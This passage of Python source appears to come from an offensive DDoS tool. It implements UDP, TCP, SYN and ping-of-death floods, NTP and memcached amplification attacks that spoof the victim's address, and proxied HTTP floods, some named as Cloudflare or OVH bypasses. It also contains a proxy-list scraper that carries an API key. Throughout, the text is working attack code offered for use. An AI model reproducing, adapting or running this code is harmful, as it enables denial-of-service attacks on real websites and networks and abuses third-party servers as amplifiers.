for _ in range(threads):
threading.Thread(target=mem, args=(event, timer), daemon=True).start()
elif method == "ntp":
for _ in range(threads):
threading.Thread(target=ntp, args=(event, timer), daemon=True).start()
# layer3
elif method == "icmp":
for _ in range(threads):
threading.Thread(target=icmp, args=(event, timer), daemon=True).start()
elif method == "pod":
for _ in range(threads):
threading.Thread(target=pod, args=(event, timer), daemon=True).start()
except:
pass
def random_data():
return str(Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + str(Intn(0, 271004281257)) + Choice(
strings) + Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + str(Intn(0, 271004281257)) + Choice(
strings))
def Headers(method):
header = ""
if method == "get" or method == "head":
connection = "Connection: Keep-Alive\r\n"
accept = Choice(acceptall) + "\r\n"
referer = "Referer: " + referers + target + path + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
header = referer + useragent + accept + connection + "\r\n\r\n"
elif method == "cookie":
connection = "Connection: Keep-Alive\r\n"
more = "cache-control: no-cache\r\n"
parm = "pragma: no-cache\r\n"
up = "upgrade-insecure-requests: 1"
connection += "Cookies: " + str(secrets.token_urlsafe(16)) + "\r\n"
accept = Choice(acceptall) + "\r\n"
referer = "Referer: " + referers + target + path + "\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
header = referer + useragent + accept + connection + more + up + parm + "\r\n\r\n"
elif method == "brust":
connection = "Connection: Keep-Alive\r\n"
more = "Cache-Control: max-age=0\r\n"
more2 = "Via: 1.0 PROXY\r\n"
proxyd = str(proxy)
xfor = "X-Forwarded-For: " + proxyd + "\r\n"
accept = "Accept: */*\r\n"
referer = "Referer: " + referers + target + path + "\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
header = referer + useragent + accept + connection + more + xfor + more2 + "\r\n\r\n"
elif method == "even":
up = "Upgrade-Insecure-Requests: 1\r\n"
referer = "Referer: " + referers + target + path + "\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
proxyd = str(proxy)
xfor = "X-Forwarded-For: " + proxyd + "\r\n"
header = referer + useragent + up + xfor + "\r\n\r\n"
elif method == "ovh":
accept = Choice(acceptall) + "\r\n"
more = "Connection: keep-alive\r\n"
connection = "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
up = "Upgrade-Insecure-Requests: 1\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
header = useragent + more + accept + up + "\r\n\r\n"
elif method == "pps":
header = "GET / HTTP/1.1\r\n\r\n"
elif method == "dyn":
connection = "Connection: Keep-Alive\r\n"
accept = Choice(acceptall) + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
referer = "Referer: " + referers + target + path + "\r\n"
useragent = "User-Agent: " + UserAgent + "\r\n"
header = referer + useragent + accept + connection + "\r\n\r\n"
elif method == "socket":
header = ""
elif method == "null":
connection = "Connection: null\r\n"
accept = Choice(acceptall) + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
referer = "Referer: null\r\n"
useragent = "User-Agent: null\r\n"
header = referer + useragent + accept + connection + "\r\n\r\n"
elif method == "post":
post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
refer = "Referer: http://" + target + path + "\r\n"
user_agent = "User-Agent: " + UserAgent + "\r\n"
accept = Choice(acceptall) + "\r\n"
connection = "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
data = str(random._urandom(8))
length = "Content-Length: " + str(len(data)) + " \r\nConnection: Keep-Alive\r\n"
header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
elif method == "hit":
post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
refer = "Referer: http://" + target + path + "\r\n"
user_agent = "User-Agent: " + UserAgent + "\r\n"
connection = "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
accept = Choice(acceptall) + "\r\n"
data = str(random._urandom(8))
length = "Content-Length: " + str(len(data)) + " \r\nConnection: Keep-Alive\r\n"
header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
return header
def UrlFixer(original_url):
global target, path, port, protocol
original_url = original_url.strip()
url = ""
path = "/"
clear_screen()
url = str(input("Insert IP/Web http://"))
port = str(input("Insert Port: "))
protocol = "http"
tmp = url.split("/")
if (port=="443"):
protocol = "https"
website = tmp[0]
check = website.split(":")
target = check[0]
if len(tmp) > 1:
path = url.replace(website, "", 1)
def udp(event, timer):
event.wait()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while time.time() < timer:
try:
try:
data = random._urandom(int(Intn(1024, 60000)))
for _ in range(multiple):
s.sendto(data, (str(target), int(port)))
except:
s.close()
except:
s.close()
def icmp(event, timer):
event.wait()
while time.time() < timer:
try:
for _ in range(multiple):
packet = random._urandom(int(Intn(1024, 60000)))
pig(target, count=10, interval=0.2, payload_size=len(packet), payload=packet)
except:
pass
ntp_payload = "\x17\x00\x03\x2a" + "\x00" * 4
def ntp(event, timer):
packets = Intn(10, 150)
server = Choice(ntpsv)
event.wait()
while time.time() < timer:
try:
packet = (
IP(dst=server, src=target)
/ UDP(sport=Intn(1, 65535), dport=int(port))
/ Raw(load=ntp_payload)
)
try:
for _ in range(multiple):
send(packet, count=packets, verbose=False)
except:
pass
except:
pass
mem_payload = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
def mem(event, timer):
event.wait()
packets = Intn(1024, 60000)
server = Choice(memsv)
while time.time() < timer:
try:
try:
packet = (
IP(dst=server, src=target)
/ UDP(sport=port, dport=11211)
/ Raw(load=mem_payload)
)
for _ in range(multiple):
send(packet, count=packets, verbose=False)
except:
pass
except:
pass
def tcp(event, timer):
event.wait()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while time.time() < timer:
try:
data = random._urandom(int(Intn(1024, 60000)))
address = (str(target), int(port))
try:
s.connect(address)
for _ in range(multiple):
s.send(data)
except:
s.close()
except:
s.close()
def vse(event, timer):
event.wait()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while time.time() < timer:
try:
address = (str(target), int(port))
try:
s.connect(address)
for _ in range(multiple):
s.send(data)
except:
s.close()
except:
s.close()
class DNSQuery:
def __init__(self, data):
self.data = data
self.dominio = ''
self.DnsType = ''
HDNS=data[-4:-2].encode("hex")
if HDNS == "0001":
self.DnsType='A'
elif HDNS == "000f":
self.DnsType='MX'
elif HDNS == "0002":
self.DnsType='NS'
elif HDNS == "0010":
self.DnsType="TXT"
else:
self.DnsType="Unknown"
tipo = (ord(data[2]) >> 3) & 15 # Opcode bits
if tipo == 0: # Standard query
ini=12
lon=ord(data[ini])
while lon != 0:
self.dominio+=data[ini+1:ini+lon+1]+'.'
ini+=lon+1
lon=ord(data[ini])
def respuesta(self, ip):
packet=''
if self.dominio:
packet+=self.data[:2] + "\x81\x80"
packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts
packet+=self.data[12:] # Original Domain Name Question
packet+='\xc0\x0c' # Pointer to domain name
packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes
packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP
return packet
def dns(event, timer):
event.wait()
while time.time() < timer:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('',53))
data, addr = s.recvfrom(1024)
p = DNSQuery(data)
for _ in range(multiple):
s.sendto(p.respuesta(target), addr)
except:
s.close()
def syn(event, timer):
event.wait()
while time.time() < timer:
try:
IP_Packet = IP ()
IP_Packet.src = randomIP()
IP_Packet.dst = target
TCP_Packet = TCP ()
TCP_Packet.sport = randint(1, 65535)
TCP_Packet.dport = int(port)
TCP_Packet.flags = "S"
TCP_Packet.seq = randint(1000, 9000)
TCP_Packet.window = randint(1000, 9000)
for _ in range(multiple):
send(IP_Packet/TCP_Packet, verbose=0)
except:
pass
def pod(event, timer):
event.wait()
while time.time() < timer:
try:
rand_addr = spoofer()
ip_hdr = IP(src=rand_addr, dst=target)
packet = ip_hdr / ICMP() / ("m" * 60000)
send(packet)
except:
pass
def stop():
print('All Attacks Stopped !')
os.system('pkill python*')
exit()
def dyn(event, socks_type):
header = Headers("dyn")
proxy = Choice(proxies).strip().split(":")
get_host = "GET " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + random_data() + "." + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def http(event, socks_type):
header = Headers("get")
proxy = Choice(proxies).strip().split(":")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def capb(event, socks_type):
header = Headers("get")
proxy = Choice(proxies).strip().split(":")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def ovh(event, socks_type):
header = Headers("ovh")
proxy = Choice(proxies).strip().split(":")
get_host = "HEAD " + path + "/" + str(Intn(1111111111, 9999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def pps(event, socks_type):
proxy = Choice(proxies).strip().split(":")
request = Headers("pps")
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def even(event, socks_type):
global proxy
proxy = Choice(proxies).strip().split(":")
header = Headers("even")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def brust(event, socks_type):
global proxy
proxy = Choice(proxies).strip().split(":")
header = Headers("brust")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def cookie(event, socks_type):
proxy = Choice(proxies).strip().split(":")
header = Headers("cookie")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def cfb(event, socks_type):
header = Headers("get")
proxy = Choice(proxies).strip().split(":")
get_host = "GET " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
cfscrape.create_scraper(sess=s)
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
# def tor(event, socks_type):
# event.wait()
# while time.time() < timer:
# with tor_requests_session() as s:
# s.get(sys.argv[2])
def AVB(event, socks_type):
proxy = Choice(proxies).strip().split(":")
event.wait()
payload = str(random._urandom(64))
while time.time() < timer:
try:
s = cfscrape.create_scraper()
if socks_type == 5 or socks_type == 4:
s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
if socks_type == 1:
s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1])
if protocol == "https":
s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384"
try:
for _ in range(multiple):
s.post(sys.argv[2], timeout=1, data=payload)
except:
s.close()
except:
s.close()
def bypass(event, socks_type):
proxy = Choice(proxies).strip().split(":")
event.wait()
payload = str(random._urandom(64))
while time.time() < timer:
try:
s = requests.Session()
if socks_type == 5 or socks_type == 4:
s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
if socks_type == 1:
s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1])
if protocol == "https":
s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384"
try:
for _ in range(multiple):
s.post(sys.argv[2], timeout=1, data=payload)
except:
s.close()
except:
s.close()
def dgb(event, socks_type):
proxy = Choice(proxies).strip().split(":")
event.wait()
while time.time() < timer:
try:
s = cfscrape.create_scraper()
if socks_type == 5 or socks_type == 4:
s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1])
if socks_type == 1:
s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1])
s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1])
if protocol == "https":
s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384"
try:
sleep(5)
for _ in range(multiple):
s.get(sys.argv[2])
except:
s.close()
except:
s.close()
def head(event, socks_type):
proxy = Choice(proxies).strip().split(":")
header = Headers("head")
head_host = "HEAD " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def null(event, socks_type):
proxy = Choice(proxies).strip().split(":")
header = Headers("null")
head_host = "HEAD " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def gsb(event, socks_type):
proxy = Choice(proxies).strip().split(":")
header = Headers("head")
head_host = "HEAD " + path + "?q=" + str(Intn(000000000, 999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
sleep(5)
for _ in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
def hit(event, timer):
global s
request = Headers("hit")
event.wait()
while time.time() < timer:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(target), int(port)))
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
def cfbc(event, socks_type):
request = Headers("cfb")
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
def post(event, socks_type):
request = Headers("post")
proxy = Choice(proxies).strip().split(":")
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
def stress(event, socks_type):
request = Headers("stress")
proxy = Choice(proxies).strip().split(":")
event.wait()
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
def ostress(event, timer):
request = Headers("stress")
event.wait()
while time.time() < timer:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(target), int(port)))
try:
for _ in range(multiple):
s.sendall(str.encode(request))
except:
s.close()
except:
s.close()
socket_list = []
t = 0
def slow(conn, socks_type):
global t
proxy = Choice(proxies).strip().split(":")
get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
header = Headers("get")
request = get_host + header
while time.time() < timer:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
for _ in range(conn):
try:
s.send(request) * conn
t += 1
sys.stdout.write("Connections = " + t + "\r")
sys.stdout.flush()
except:
s.close()
proxy = Choice(proxies).strip().split(":")
except:
s.close()
proxy = Choice(proxies).strip().split(":")
def checking(lines, socks_type, ms):
global nums, proxies
proxy = lines.strip().split(":")
if len(proxy) != 2:
proxies.remove(lines)
return
err = 0
while True:
if err == 3:
proxies.remove(lines)
break
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if socks_type == 1:
s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1]))
s.settimeout(ms)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
s.send(str.encode("GET / HTTP/1.1\r\n\r\n"))
s.close()
break
except:
err += 1
nums += 1
nums = 0
def check_socks(ms):
global nums
thread_list = []
for lines in list(proxies):
if choice == "5":
th = threading.Thread(target=checking, args=(lines, 5, ms,))
th.start()
if choice == "4":
th = threading.Thread(target=checking, args=(lines, 4, ms,))
th.start()
if choice == "1":
th = threading.Thread(target=checking, args=(lines, 1, ms,))
th.start()
thread_list.append(th)
sleep(0.01)
for th in list(thread_list):
th.join()
ans = "y"
if ans == "y" or ans == "":
if choice == "4":
with open(out_file, 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines, encoding='utf8'))
fp.close()
elif choice == "5":
with open(out_file, 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines, encoding='utf8'))
fp.close()
elif choice == "1":
with open(out_file, 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines, encoding='utf8'))
fp.close()
def check_list(socks_file):
temp = open(socks_file).readlines()
temp_list = []
for i in temp:
if i not in temp_list:
if ':' in i:
temp_list.append(i)
rfile = open(socks_file, "wb")
for i in list(temp_list):
rfile.write(bytes(i, encoding='utf-8'))
rfile.close()
def downloadsocks(choice):
global out_file
if choice == "4":
f = open(out_file, 'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all",
timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4", timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks4", timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get(
"https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=socks4&lastchecked=60",
timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt", timeout=5)
f.write(r.content)
f.close()
except:
f.close()
try:
req = requests.get("https://www.socks-proxy.net/", timeout=5, headers={"User-Agent", UserAgent}).text
part = str(req)
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies = proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open(out_file, "a")
out_file.write(proxies)
out_file.close()
except:
pass
if choice == "5":
f = open(out_file, 'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all",
timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5", timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks5", timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt", timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get(
"https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=socks5&lastchecked=60",
timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get(
"https://gist.githubusercontent.com/Azuures/1e0cb7a1097c720b4ed2aa63acd82179/raw/97d2d6a11873ffa8ca763763f7a5dd4035bcf95f/fwefnwex",
timeout=5)
f.write(r.content)
f.close()
except:
f.close()
if choice == "1":
f = open(out_file, 'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=http&country=all",
timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=http", timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=http", timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/http.txt", timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get(
"https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=http&lastchecked=60",
timeout=5)
f.write(r.content)
f.close()
except:
f.close()
def main():
global proxies, multiple, choice, timer, out_file
method = str(sys.argv[1]).lower()
out_file = str("files/proxys/" + sys.argv[5])
if not os.path.exists(out_file):
makefile(out_file)
if method == "check":
proxydl(out_file, socks_type)
exit()
if method == "stop":
url = str(sys.argv[2]).strip()
UrlFixer(url)
stop()
elif (method == "help") or (method == "h"):
usge()
elif (method == "check"):
pass
